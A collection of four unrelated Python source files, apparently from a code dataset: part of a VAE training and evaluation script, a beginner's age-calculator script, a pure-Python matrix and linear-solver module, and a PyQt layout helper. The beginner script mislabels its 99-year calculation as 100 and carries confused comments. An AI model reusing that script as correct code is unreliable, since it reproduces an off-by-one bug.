max_kl_item = -1
max_kl_weight = None
continue_anneal = model_args.peak_anneal
if model_args.peak_anneal:
model_args.warm_up = 0
memory_temp_count = 0
t_type = torch.Tensor
adv_select = ["ADVCoupleVAE", "VSAE", "ACVAE", "DVAE", "SVAE"]
if model_args.model_select in adv_select:
if not model_args.dis_train:
x = input("you forget set the dis training?,switch it?[Y/N]")
model_args.dis_train = (x.lower() == "y")
adv_training = model_args.dis_train and model_args.model_select in adv_select
if adv_training:
print("has the adv training process")
adv_syn = model_args.adv_syn > 0. or model_args.infer_weight * model_args.inf_sem
adv_sem = model_args.adv_sem > 0. or model_args.infer_weight * model_args.inf_syn
print(model_args.dev_item.lower())
while True:
epoch += 1
train_track = {}
for batch_examples in train_set.batch_iter(batch_size=main_args.batch_size, shuffle=True):
train_iter += 1
if adv_training:
ret_loss = model.get_loss(batch_examples, train_iter, is_dis=True)
if adv_syn:
dis_syn_loss = ret_loss['dis syn']
optimizer.zero_grad()
dis_syn_loss.backward()
if main_args.clip_grad > 0.:
torch.nn.utils.clip_grad_norm_(model.parameters(), main_args.clip_grad)
# optimizer.step()
if adv_sem:
ret_loss = model.get_loss(batch_examples, train_iter, is_dis=True)
dis_sem_loss = ret_loss['dis sem']
optimizer.zero_grad()
dis_sem_loss.backward()
if main_args.clip_grad > 0.:
torch.nn.utils.clip_grad_norm_(model.parameters(), main_args.clip_grad)
# optimizer.step()
ret_loss = model.get_loss(batch_examples, train_iter)
loss = ret_loss['Loss']
optimizer.zero_grad()
loss.backward()
if main_args.clip_grad > 0.:
torch.nn.utils.clip_grad_norm_(model.parameters(), main_args.clip_grad)
optimizer.step()
train_iter += 1
# tracker = update_track(loss, train_avg_kl, train_avg_nll, tracker)
train_track = log_tracker(ret_loss, train_track)
if train_iter % main_args.log_every == 0:
train_avg_nll = ret_loss['NLL Loss']
train_avg_kl = ret_loss['KL Loss']
_kl_weight = ret_loss['KL Weight']
for key, val in ret_loss.items():
writer.add_scalar(
'Train-Iter/VAE/{}'.format(key),
val.item() if isinstance(val, t_type) else val,
train_iter
)
print("\rTrain-Iter %04d, Loss %9.4f, NLL-Loss %9.4f, KL-Loss %9.4f, KL-Weight %6.3f, WD-Drop %6.3f"
% (train_iter, loss.item(), train_avg_nll, train_avg_kl, _kl_weight, model.step_unk_rate),
end=' ')
writer.add_scalar(
tag='optimize/lr',
scalar_value=optimizer.param_groups[0]['lr'],
global_step=train_iter,
)
if train_iter % main_args.dev_every == 0 and train_iter > model_args.warm_up:
# dev_track, eval_results = _test_vae(model, dev_set, main_args, train_iter)
dev_track, eval_results = evaluator.evaluate_reconstruction(examples=dev_set.examples,
eval_desc="dev{}".format(train_iter),
eval_step=train_iter, write_down=False)
_weight = model.get_kl_weight(step=train_iter)
_kl_item = torch.mean(dev_track['KL Item'])
# writer.add_scalar("VAE/Valid-Iter/KL Item", _kl_item, train_iter)
for key, val in dev_track.items():
writer.add_scalar(
'Valid-Iter/VAE/{}'.format(key),
torch.mean(val) if isinstance(val, t_type) else val,
train_iter
)
if continue_anneal and model.step_kl_weight is None:
if _kl_item > max_kl_item:
max_kl_item = _kl_item
max_kl_weight = _weight
else:
if (max_kl_item - _kl_item) > model_args.stop_clip_kl:
model.step_kl_weight = max_kl_weight
writer.add_text(tag='peak_anneal',
text_string="fixed the kl weight:{} with kl peak:{} at step:{}".format(
max_kl_weight,
max_kl_item,
train_iter
), global_step=train_iter)
continue_anneal = False
dev_elbo = torch.mean(dev_track['Model Score'])
writer.add_scalar("Evaluation/VAE/Dev Score", dev_elbo, train_iter)
# evaluate bleu
dev_bleu = eval_results['accuracy']
print()
print("Valid-Iter %04d, NLL_Loss:%9.4f, KL_Loss: %9.4f, Sum Score:%9.4f BLEU:%9.4f" % (
train_iter,
torch.mean(dev_track['NLL Loss']),
torch.mean(dev_track['KL Loss']),
dev_elbo,
eval_results['accuracy']), file=sys.stderr
)
writer.add_scalar(
tag='Evaluation/VAE/Iter %s' % model.args.eval_mode,
scalar_value=dev_bleu,
global_step=train_iter
)
if model_args.dev_item == "ELBO" or model_args.dev_item.lower() == "para-elbo" or model_args.dev_item.lower() == "gen-elbo":
is_better = history_elbo == [] or dev_elbo < min(history_elbo)
elif model_args.dev_item == "BLEU" or model_args.dev_item.lower() == "para-bleu" or model_args.dev_item.lower() == "gen-bleu":
is_better = history_bleu == [] or dev_bleu > max(history_bleu)
history_elbo.append(dev_elbo)
writer.add_scalar("Evaluation/VAE/Best Score", min(history_elbo), train_iter)
history_bleu.append(dev_bleu)
writer.add_scalar("Evaluation/VAE/Best BLEU Score", max(history_bleu), train_iter)
if is_better:
writer.add_scalar(
tag='Evaluation/VAE/Best %s' % model.args.eval_mode,
scalar_value=dev_bleu,
global_step=train_iter
)
writer.add_scalar(
tag='Evaluation/VAE/Best NLL-LOSS',
scalar_value=torch.mean(dev_track['NLL Loss']),
global_step=train_iter
)
writer.add_scalar(
tag='Evaluation/VAE/Best KL-LOSS',
scalar_value=torch.mean(dev_track['KL Loss']),
global_step=train_iter
)
if train_iter * 2 > model_args.x0:
memory_temp_count = 3
if model_args.dev_item.lower().startswith("gen") and memory_temp_count > 0:
evaluator.evaluate_generation(
sample_size=len(dev_set.examples),
eval_desc="gen_iter{}".format(train_iter),
)
memory_temp_count -= 1
if model_args.dev_item.lower().startswith("para") and memory_temp_count > 0:
para_score = evaluator.evaluate_para(
eval_dir="/home/user_data/baoy/projects/seq2seq_parser/data/quora-mh/unsupervised",
# eval_list=["para.raw.text", "para.text"])
# eval_list=["para.raw.text"])
eval_list=["dev.para.txt", "test.para.txt"],
eval_desc="para_iter{}".format(train_iter))
if memory_temp_count == 3:
writer.add_scalar(
tag='Evaluation/VAE/Para Dev Ori-BLEU',
scalar_value=para_score[0][0],
global_step=train_iter
)
writer.add_scalar(
tag='Evaluation/VAE/Para Dev Tgt-BLEU',
scalar_value=para_score[0][1],
global_step=train_iter
)
if len(para_score) > 1:
writer.add_scalar(
tag='Evaluation/VAE/Para Test Ori-BLEU',
scalar_value=para_score[1][0],
global_step=train_iter
)
writer.add_scalar(
tag='Evaluation/VAE/Para Test Tgt-BLEU',
scalar_value=para_score[1][1],
global_step=train_iter
)
memory_temp_count -= 1
model, optimizer, num_trial, patience = lr_schedule(
is_better=is_better,
model_dir=model_dir,
model_file=model_file,
main_args=main_args,
patience=patience,
num_trial=num_trial,
epoch=epoch,
model=model,
optimizer=optimizer,
reload_model=model_args.reload_model,
)
model.train()
elbo = torch.mean(train_track['Model Score'])
print()
print("Train-Epoch %02d, Score %9.4f" % (epoch, elbo))
for key, val in train_track.items():
writer.add_scalar(
'Train-Epoch/VAE/{}'.format(key),
torch.mean(val) if isinstance(val, t_type) else val,
epoch
)
def test_vae(main_args, model_args, input_mode=0):
model = load_model(main_args, model_args, check_dir=False)
out_dir = get_eval_dir(main_args=main_args, model_args=model_args, mode="Test")
model.eval()
if not os.path.exists(out_dir):
sys.exit(-1)
if model_args.model_select.startswith("Origin"):
model_args.eval_bs = 20 if model_args.eval_bs < 20 else model_args.eval_bs
evaluator = VaeEvaluator(
model=model,
out_dir=out_dir,
eval_batch_size=model_args.eval_bs,
train_batch_size=main_args.batch_size
)
train_exam = Dataset.from_bin_file(main_args.train_file).examples
para_eval_dir = "/home/user_data/baoy/projects/seq2seq_parser/data/quora-mh/unsupervised"
para_eval_list = ["dev.para.txt"]
# ["dev.para.txt", "test.para.txt"]
if input_mode == 0:
print("========dev reconstructor========")
test_set = Dataset.from_bin_file(main_args.dev_file)
evaluator.evaluate_reconstruction(examples=test_set.examples, eval_desc="dev")
print("finish")
print("========test reconstructor=======")
test_set = Dataset.from_bin_file(main_args.test_file)
evaluator.evaluate_reconstruction(examples=test_set.examples, eval_desc="test")
print("finish")
print("========generating samples=======")
evaluator.evaluate_generation(corpus_examples=train_exam, sample_size=len(test_set.examples), eval_desc="gen")
print("finish")
elif input_mode == 1:
print("========generating samples=======")
test_exam = Dataset.from_bin_file(main_args.test_file).examples
evaluator.evaluate_generation(corpus_examples=train_exam, sample_size=len(test_exam), eval_desc="gen")
print("finish")
elif input_mode == 2:
print("========generating paraphrase========")
evaluator.evaluate_para(eval_dir=para_eval_dir, eval_list=para_eval_list)
print("finish")
elif input_mode == 3:
print("========supervised generation========")
# evaluator.evaluate_control()
evaluator.evaluate_control(eval_dir=para_eval_dir, eval_list=para_eval_list)
print("finish")
elif input_mode == 4:
trans_eval_list = ["trans.length.txt", "trans.random.txt"]
print("========style transfer========")
evaluator.evaluate_style_transfer(eval_dir=para_eval_dir, eval_list=trans_eval_list, eval_desc="unmatch")
evaluator.evaluate_style_transfer(eval_dir=para_eval_dir, eval_list=para_eval_list, eval_desc="match")
print("finish")
elif input_mode == 5:
print("========random syntax select========")
evaluator.evaluate_pure_para(eval_dir=para_eval_dir, eval_list=para_eval_list)
print("finish")
else:
raw = input("raw sent: ")
while not raw.startswith("EXIT"):
e = to_example(raw)
words = model.predict(e)
print("origin:", " ".join(words[0][0][0]))
to_ref = input("ref syn : ")
while not to_ref.startswith("NEXT"):
syn_ref = to_example(to_ref)
ret = model.eval_adv(e, syn_ref)
if not model_args.model_select == "OriginVAE":
print("ref syntax: ", " ".join(ret['ref syn'][0][0][0]))
print("ori syntax: ", " ".join(ret['ori syn'][0][0][0]))
print("switch result: ", " ".join(ret['res'][0][0][0]))
to_ref = input("ref syn: ")
raw = input("input : ")
def process_args():
opt_parser = argparse.ArgumentParser()
opt_parser.add_argument('--config_files', type=str, help='config_files')
opt_parser.add_argument('--exp_name', type=str, help='config_files')
opt_parser.add_argument('--load_src_lm', type=str, default=None)
opt_parser.add_argument('--mode', type=str, default=None)
opt = opt_parser.parse_args()
configs = yaml_load_dict(opt.config_files)
base_args = dict_to_args(configs['base_configs']) if 'base_configs' in configs else None
baseline_args = dict_to_args(configs['baseline_configs']) if 'baseline_configs' in configs else None
prior_args = dict_to_args(configs['prior_configs']) if 'prior_configs' in configs else None
encoder_args = dict_to_args(configs['encoder_configs']) if 'encoder_configs' in configs else None
decoder_args = dict_to_args(configs['decoder_configs']) if 'decoder_configs' in configs else None
vae_args = dict_to_args(configs['vae_configs']) if 'vae_configs' in configs else None
ae_args = dict_to_args(configs["ae_configs"]) if 'ae_configs' in configs else None
if base_args is not None:
if opt.mode is not None:
base_args.mode = opt.mode
if opt.exp_name is not None:
base_args.exp_name = opt.exp_name
if opt.load_src_lm is not None:
base_args.load_src_lm = opt.load_src_lm
return {
'base': base_args,
"baseline": baseline_args,
'prior': prior_args,
'encoder': encoder_args,
"decoder": decoder_args,
"vae": vae_args,
"ae": ae_args,
}
if __name__ == "__main__":
config_args = process_args()
args = config_args['base']
if args.mode == "train_sent":
train_vae(args, config_args['vae'])
elif args.mode == "train_ae":
train_ae(args, config_args['ae'])
elif args.mode == "test_vae":
raw_sent = int(input("select test mode: "))
test_vae(args, config_args['vae'], input_mode=raw_sent)
elif args.mode == "test_vaea":
test_vae(args, config_args['vae'], input_mode=0)
elif args.mode == "test_generating":
test_vae(args, config_args['vae'], input_mode=1)
elif args.mode == "test_paraphrase":
test_vae(args, config_args['vae'], input_mode=2)
elif args.mode == "test_control":
test_vae(args, config_args['vae'], input_mode=3)
elif args.mode == "test_transfer":
test_vae(args, config_args['vae'], input_mode=4)
elif args.mode == "test_pure_para":
test_vae(args, config_args['vae'], input_mode=5)
else:
raise NotImplementedError
|
python
|
# coding= UTF-8
### Command line of python <filename> was getting angry till I added the line above. I think ### it needs to know what types of characters to expect (i.e. latin, korean, etc..)
import datetime
### I needed to switch to single quotes instead of double. I’m not sure why...
name = raw_input('Yo what yo name sucka? ')
age = int(raw_input('Just how ancient are you? '))
now = datetime.datetime.now()
#calculate when a person will be 100 years old by taking the
#current year, subtracting their current age then adding 100
#years.
def year_when_99(age):
when_you_will_be_99 = now.year - age + 99
return when_you_will_be_99
### The line below would not work until I put the variable answer before the function. From a
### computer’s mind, reading code left to right it will identify that there is an ‘empty’ variable
### named answer and oh okay we are going to run this function and put the returned result ### in it
answer = year_when_99(age)
print "%s, you will be 100 years old in the year %s\n" % (name, answer)
rub_it_in_num = int(raw_input('Give me a number, old fart? '))
print "%s, you will be 100 years old in the year %s\n" % (name, answer) * rub_it_in_num
|
python
|
# -*- coding: utf-8 -*-
# type: ignore
"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2019 Caleb Bell <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import division
from math import sin, exp, pi, fabs, copysign, log, isinf, acos, cos, sin, sqrt
import sys
REQUIRE_DEPENDENCIES = False
if not REQUIRE_DEPENDENCIES:
IS_PYPY = True
else:
try:
# The right way imports the platform module which costs to ms to load!
# implementation = platform.python_implementation()
IS_PYPY = 'PyPy' in sys.version
except AttributeError:
IS_PYPY = False
#IS_PYPY = True # for testing
#if not IS_PYPY and not REQUIRE_DEPENDENCIES:
# try:
# import numpy as np
# except ImportError:
# np = None
__all__ = ['dot', 'inv', 'det', 'solve', 'norm2', 'inner_product',
'eye', 'array_as_tridiagonals', 'solve_tridiagonal', 'subset_matrix']
primitive_containers = frozenset([list, tuple])
def det(matrix):
"""Seem sto work fine.
>> from sympy import *
>> from sympy.abc import *
>> Matrix([[a, b], [c, d]]).det()
a*d - b*c
>> Matrix([[a, b, c], [d, e, f], [g, h, i]]).det()
a*e*i - a*f*h - b*d*i + b*f*g + c*d*h - c*e*g
A few terms can be slightly factored out of the 3x dim.
>> Matrix([[a, b, c, d], [e, f, g, h], [i, j, k, l], [m, n, o, p]]).det()
a*f*k*p - a*f*l*o - a*g*j*p + a*g*l*n + a*h*j*o - a*h*k*n - b*e*k*p + b*e*l*o + b*g*i*p - b*g*l*m - b*h*i*o + b*h*k*m + c*e*j*p - c*e*l*n - c*f*i*p + c*f*l*m + c*h*i*n - c*h*j*m - d*e*j*o + d*e*k*n + d*f*i*o - d*f*k*m - d*g*i*n + d*g*j*m
72 mult vs ~48 in cse'd version'
Commented out - takes a few seconds
>> #Matrix([[a, b, c, d, e], [f, g, h, i, j], [k, l, m, n, o], [p, q, r, s, t], [u, v, w, x, y]]).det()
260 multiplies with cse; 480 without it.
"""
size = len(matrix)
if size == 1:
return matrix[0]
elif size == 2:
(a, b), (c, d) = matrix
return a*d - c*b
elif size == 3:
(a, b, c), (d, e, f), (g, h, i) = matrix
return a*(e*i - h*f) - d*(b*i - h*c) + g*(b*f - e*c)
elif size == 4:
(a, b, c, d), (e, f, g, h), (i, j, k, l), (m, n, o, p) = matrix
return (a*f*k*p - a*f*l*o - a*g*j*p + a*g*l*n + a*h*j*o - a*h*k*n
- b*e*k*p + b*e*l*o + b*g*i*p - b*g*l*m - b*h*i*o + b*h*k*m
+ c*e*j*p - c*e*l*n - c*f*i*p + c*f*l*m + c*h*i*n - c*h*j*m
- d*e*j*o + d*e*k*n + d*f*i*o - d*f*k*m - d*g*i*n + d*g*j*m)
elif size == 5:
(a, b, c, d, e), (f, g, h, i, j), (k, l, m, n, o), (p, q, r, s, t), (u, v, w, x, y) = matrix
x0 = s*y
x1 = a*g*m
x2 = t*w
x3 = a*g*n
x4 = r*x
x5 = a*g*o
x6 = t*x
x7 = a*h*l
x8 = q*y
x9 = a*h*n
x10 = s*v
x11 = a*h*o
x12 = r*y
x13 = a*i*l
x14 = t*v
x15 = a*i*m
x16 = q*w
x17 = a*i*o
x18 = s*w
x19 = a*j*l
x20 = q*x
x21 = a*j*m
x22 = r*v
x23 = a*j*n
x24 = b*f*m
x25 = b*f*n
x26 = b*f*o
x27 = b*h*k
x28 = t*u
x29 = b*h*n
x30 = p*x
x31 = b*h*o
x32 = b*i*k
x33 = p*y
x34 = b*i*m
x35 = r*u
x36 = b*i*o
x37 = b*j*k
x38 = s*u
x39 = b*j*m
x40 = p*w
x41 = b*j*n
x42 = c*f*l
x43 = c*f*n
x44 = c*f*o
x45 = c*g*k
x46 = c*g*n
x47 = c*g*o
x48 = c*i*k
x49 = c*i*l
x50 = p*v
x51 = c*i*o
x52 = c*j*k
x53 = c*j*l
x54 = q*u
x55 = c*j*n
x56 = d*f*l
x57 = d*f*m
x58 = d*f*o
x59 = d*g*k
x60 = d*g*m
x61 = d*g*o
x62 = d*h*k
x63 = d*h*l
x64 = d*h*o
x65 = d*j*k
x66 = d*j*l
x67 = d*j*m
x68 = e*f*l
x69 = e*f*m
x70 = e*f*n
x71 = e*g*k
x72 = e*g*m
x73 = e*g*n
x74 = e*h*k
x75 = e*h*l
x76 = e*h*n
x77 = e*i*k
x78 = e*i*l
x79 = e*i*m
return (x0*x1 - x0*x24 + x0*x27 + x0*x42 - x0*x45 - x0*x7 - x1*x6
+ x10*x11 - x10*x21 - x10*x44 + x10*x52 + x10*x69 - x10*x74
- x11*x20 + x12*x13 + x12*x25 - x12*x3 - x12*x32 - x12*x56
+ x12*x59 - x13*x2 + x14*x15 + x14*x43 - x14*x48 - x14*x57
+ x14*x62 - x14*x9 - x15*x8 + x16*x17 - x16*x23 - x16*x58
+ x16*x65 + x16*x70 - x16*x77 - x17*x22 + x18*x19 + x18*x26
- x18*x37 - x18*x5 - x18*x68 + x18*x71 - x19*x4 - x2*x25
+ x2*x3 + x2*x32 + x2*x56 - x2*x59 + x20*x21 + x20*x44
- x20*x52 - x20*x69 + x20*x74 + x22*x23 + x22*x58 - x22*x65
- x22*x70 + x22*x77 + x24*x6 - x26*x4 - x27*x6 + x28*x29
- x28*x34 - x28*x46 + x28*x49 + x28*x60 - x28*x63 - x29*x33
+ x30*x31 - x30*x39 - x30*x47 + x30*x53 + x30*x72 - x30*x75
- x31*x38 + x33*x34 + x33*x46 - x33*x49 - x33*x60 + x33*x63
+ x35*x36 - x35*x41 - x35*x61 + x35*x66 + x35*x73 - x35*x78
- x36*x40 + x37*x4 + x38*x39 + x38*x47 - x38*x53 - x38*x72
+ x38*x75 + x4*x5 + x4*x68 - x4*x71 + x40*x41 + x40*x61
- x40*x66 - x40*x73 + x40*x78 - x42*x6 - x43*x8 + x45*x6
+ x48*x8 + x50*x51 - x50*x55 - x50*x64 + x50*x67 + x50*x76
- x50*x79 - x51*x54 + x54*x55 + x54*x64 - x54*x67 - x54*x76
+ x54*x79 + x57*x8 + x6*x7 - x62*x8 + x8*x9)
else:
# TODO algorithm?
import numpy as np
return float(np.linalg.det(matrix))
def inv(matrix):
"""5 has way too many multiplies.
>> from sympy import *
>> from sympy.abc import *
>> Matrix([a]).inv()
Matrix([[1/a]])
>> cse(Matrix([[a, b], [c, d]]).inv())
Matrix([
[1/a + b*c/(a**2*(d - b*c/a)), -b/(a*(d - b*c/a))],
[ -c/(a*(d - b*c/a)), 1/(d - b*c/a)]])
>> m_3 = Matrix([[a, b, c], [d, e, f], [g, h, i]])
>> #cse(m_3.inv())
>> m_4 = Matrix([[a, b, c, d], [e, f, g, h], [i, j, k, l], [m, n, o, p]])
>> cse(m_4.inv())
# Note: for 3, 4 - forgot to generate code using optimizations='basic'
"""
size = len(matrix)
if size == 1:
try:
return [1.0/matrix[0]]
except:
return [1.0/matrix[0][0]]
elif size == 2:
try:
(a, b), (c, d) = matrix
x0 = 1.0/a
x1 = b*x0
x2 = 1.0/(d - c*x1)
x3 = c*x2
return [[x0 + b*x3*x0*x0, -x1*x2],
[-x0*x3, x2]]
except:
import numpy as np
return np.linalg.inv(matrix).tolist()
elif size == 3:
(a, b, c), (d, e, f), (g, h, i) = matrix
x0 = 1./a
x1 = b*d
x2 = e - x0*x1
x3 = 1./x2
x4 = b*g
x5 = h - x0*x4
x6 = x0*x3
x7 = d*x6
x8 = -g*x0 + x5*x7
x9 = c*d
x10 = f - x0*x9
x11 = b*x6
x12 = c*x0 - x10*x11
x13 = a*e
x14 = -x1 + x13
x15 = 1./(-a*f*h - c*e*g + f*x4 + h*x9 - i*x1 + i*x13)
x16 = x14*x15
x17 = x12*x16
x18 = x14*x15*x3
x19 = x18*x5
x20 = x10*x18
return [[x0 - x17*x8 + x1*x3*x0*x0, -x11 + x12*x19, -x17],
[-x20*x8 - x7, x10*x16*x5*x2**-2 + x3, -x20],
[ x16*x8, -x19, x16]]
elif size == 4:
(a, b, c, d), (e, f, g, h), (i, j, k, l), (m, n, o, p) = matrix
x0 = 1./a
x1 = b*e
x2 = f - x0*x1
x3 = 1./x2
x4 = i*x0
x5 = -b*x4 + j
x6 = x0*x3
x7 = e*x6
x8 = -x4 + x5*x7
x9 = c*x0
x10 = -e*x9 + g
x11 = b*x6
x12 = -x10*x11 + x9
x13 = a*f
x14 = -x1 + x13
x15 = k*x13
x16 = b*g*i
x17 = c*e*j
x18 = a*g*j
x19 = k*x1
x20 = c*f*i
x21 = x15 + x16 + x17 - x18 - x19 - x20
x22 = 1/x21
x23 = x14*x22
x24 = x12*x23
x25 = m*x0
x26 = -b*x25 + n
x27 = x26*x3
x28 = -m*x9 + o - x10*x27
x29 = x23*x8
x30 = -x25 + x26*x7 - x28*x29
x31 = d*x0
x32 = -e*x31 + h
x33 = x3*x32
x34 = -i*x31 + l - x33*x5
x35 = -x11*x32 - x24*x34 + x31
x36 = a*n
x37 = g*l
x38 = h*o
x39 = l*o
x40 = b*m
x41 = h*k
x42 = c*l
x43 = f*m
x44 = c*h
x45 = i*n
x46 = d*k
x47 = e*n
x48 = d*o
x49 = d*g
x50 = j*m
x51 = 1.0/(a*j*x38 - b*i*x38 - e*j*x48 + f*i*x48 + p*x15
+ p*x16 + p*x17 - p*x18 - p*x19 - p*x20 + x1*x39
- x13*x39 + x36*x37 - x36*x41 - x37*x40 + x40*x41
+ x42*x43 - x42*x47 - x43*x46 + x44*x45 - x44*x50
- x45*x49 + x46*x47 + x49*x50)
x52 = x21*x51
x53 = x35*x52
x54 = x14*x22*x3
x55 = x5*x54
x56 = -x27 + x28*x55
x57 = x52*x56
x58 = x14*x51
x59 = x28*x58
x60 = x10*x54
x61 = x33 - x34*x60
x62 = x52*x61
x63 = x34*x58
return [[x0 - x24*x8 - x30*x53 + x1*x3*x0*x0, -x11 + x12*x55 - x35*x57, -x24 + x35*x59, -x53],
[-x30*x62 - x60*x8 - x7, x10*x23*x5*x2**-2 + x3 - x56*x62, x59*x61 - x60, -x62],
[x29 - x30*x63, -x55 - x56*x63, x14*x14*x22*x28*x34*x51 + x23, -x63],
[x30*x52, x57, -x59, x52]]
else:
return inv_lu(matrix)
# TODO algorithm?
# import numpy as np
# return np.linalg.inv(matrix).tolist()
def shape(value):
'''Find and return the shape of an array, whether it is a numpy array or
a list-of-lists or other combination of iterators.
Parameters
----------
value : various
Input array, [-]
Returns
-------
shape : tuple(int, dimension)
Dimensions of array, [-]
Notes
-----
It is assumed the shape is consistent - not something like [[1.1, 2.2], [2.4]]
Examples
--------
>>> shape([])
(0,)
>>> shape([1.1, 2.2, 5.5])
(3,)
>>> shape([[1.1, 2.2, 5.5], [2.0, 1.1, 1.5]])
(2, 3)
>>> shape([[[1.1,], [2.0], [1.1]]])
(1, 3, 1)
>>> shape(['110-54-3'])
(1,)
'''
try:
return value.shape
except:
pass
dims = [len(value)]
try:
# Except this block to handle the case of no value
iter_value = value[0]
for i in range(10):
# try:
if type(iter_value) in primitive_containers:
dims.append(len(iter_value))
iter_value = iter_value[0]
else:
break
# except:
# break
except:
pass
return tuple(dims)
# try:
# try:
# new_shape = (len(value), len(value[0]), len(value[0][0]))
# except:
# new_shape = (len(value), len(value[0]))
# except:
# new_shape = (len(value),)
# return new_shape
def eye(N):
mat = []
for i in range(N):
r = [0.0]*N
r[i] = 1.0
mat.append(r)
return mat
def dot(a, b):
try:
ab = [sum([ri*bi for ri, bi in zip(row, b)]) for row in a]
except:
ab = [sum([ai*bi for ai, bi in zip(a, b)])]
return ab
def inner_product(a, b):
tot = 0.0
for i in range(len(a)):
tot += a[i]*b[i]
return tot
def inplace_LU(A, ipivot, N):
Np1 = N+1
for j in range(1, Np1):
for i in range(1, j):
tot = A[i][j]
for k in range(1, i):
tot -= A[i][k]*A[k][j]
A[i][j] = tot
apiv = 0.0
for i in range(j, Np1):
tot = A[i][j]
for k in range(1, j):
tot -= A[i][k]*A[k][j]
A[i][j] = tot
if apiv < abs(A[i][j]):
apiv, ipiv = abs(A[i][j]), i
if apiv == 0:
raise ValueError("Singular matrix")
ipivot[j] = ipiv
if ipiv != j:
for k in range(1, Np1):
t = A[ipiv][k]
A[ipiv][k] = A[j][k]
A[j][k] = t
Ajjinv = 1.0/A[j][j]
for i in range(j+1, Np1):
A[i][j] *= Ajjinv
return None
def solve_from_lu(A, pivots, b, N):
Np1 = N + 1
# Note- list call is very slow faster to replace with [i for i in row]
b = [0.0] + [i for i in b] #list(b)
for i in range(1, Np1):
tot = b[pivots[i]]
b[pivots[i]] = b[i]
for j in range(1, i):
tot -= A[i][j]*b[j]
b[i] = tot
for i in range(N, 0, -1):
tot = b[i]
for j in range(i+1, Np1):
tot -= A[i][j]*b[j]
b[i] = tot/A[i][i]
return b
def solve_LU_decomposition(A, b):
N = len(b)
A_copy = [[0.0]*(N+1)]
for row in A:
# Note- list call is very slow faster to replace with [i for i in row]
r = [0.0] + [i for i in row]
# r = list(row)
# r.insert(0, 0.0)
A_copy.append(r)
pivots = [0.0]*(N+1)
inplace_LU(A_copy, pivots, N)
return solve_from_lu(A_copy, pivots, b, N)[1:]
def inv_lu(a):
N = len(a)
Np1 = N + 1
A_copy = [[0.0]*Np1]
for row in a:
# Note- list call is very slow faster to replace with [i for i in row]
r = list(row)
r.insert(0, 0.0)
A_copy.append(r)
a = A_copy
ainv = [[0.0]*N for i in range(N)]
pivots = [0]*Np1
inplace_LU(a, pivots, N)
for j in range(N):
b = [0.0]*N
b[j] = 1.0
b = solve_from_lu(a, pivots, b, N)[1:]
for i in range(N):
ainv[i][j] = b[i]
return ainv
def solve(a, b):
if len(a) > 4:
if IS_PYPY or np is None:
return solve_LU_decomposition(a, b)
import numpy as np
return np.linalg.solve(a, b).tolist()
else:
return dot(inv(a), b)
def norm2(arr):
tot = 0.0
for i in arr:
tot += i*i
return sqrt(tot)
def array_as_tridiagonals(arr):
row_last = arr[0]
a, b, c = [], [row_last[0]], []
for i in range(1, len(row_last)):
row = arr[i]
b.append(row[i])
c.append(row_last[i])
a.append(row[i-1])
row_last = row
return a, b, c
def tridiagonals_as_array(a, b, c, zero=0.0):
N = len(b)
arr = [[zero]*N for _ in range(N)]
row_last = arr[0]
row_last[0] = b[0]
for i in range(1, N):
row = arr[i]
row[i] = b[i] # set the middle row back
row[i-1] = a[i-1]
row_last[i] = c[i-1]
row_last = row
return arr
def solve_tridiagonal(a, b, c, d):
b, d = [i for i in b], [i for i in d]
N = len(d)
for i in range(N - 1):
m = a[i]/b[i]
b[i+1] -= m*c[i]
d[i+1] -= m*d[i]
b[-1] = d[-1]/b[-1]
for i in range(N-2, -1, -1):
b[i] = (d[i] - c[i]*b[i+1])/b[i]
return b
def subset_matrix(whole, subset):
if type(subset) is slice:
subset = range(subset.start, subset.stop, subset.step)
# N = len(subset)
# new = [[None]*N for i in range(N)]
# for ni, i in enumerate(subset):
# for nj,j in enumerate(subset):
# new[ni][nj] = whole[i][j]
new = []
for i in subset:
whole_i = whole[i]
# r = [whole_i[j] for j in subset]
# new.append(r)
new.append([whole_i[j] for j in subset])
# r = []
# for j in subset:
# r.append(whole_i[j])
return new
|
python
|
""" QLayouted module. """
# ISC License
#
# Copyright (c) 2020–2022, Paul Wilhelm, M. Sc. <[email protected]>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from typing import Dict, Tuple, Callable, Union, Optional
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QLayout, QWidget, QPushButton
from magneticalc.QtWidgets2.QButtons import QButtons
class QLayouted:
""" QLayouted class. """
def __init__(self, direction: str = "vertical") -> None:
"""
Initializes the QLayouted class.
This adds a layout and several related functions like addWidget() to the parent class.
@param direction: Sets "vertical" or "horizontal" layout
"""
self._layout = QVBoxLayout() if direction == "vertical" else QHBoxLayout()
def install_layout(self, parent: QWidget) -> None:
"""
Installs this layout in the parent.
"""
parent.setLayout(self._layout)
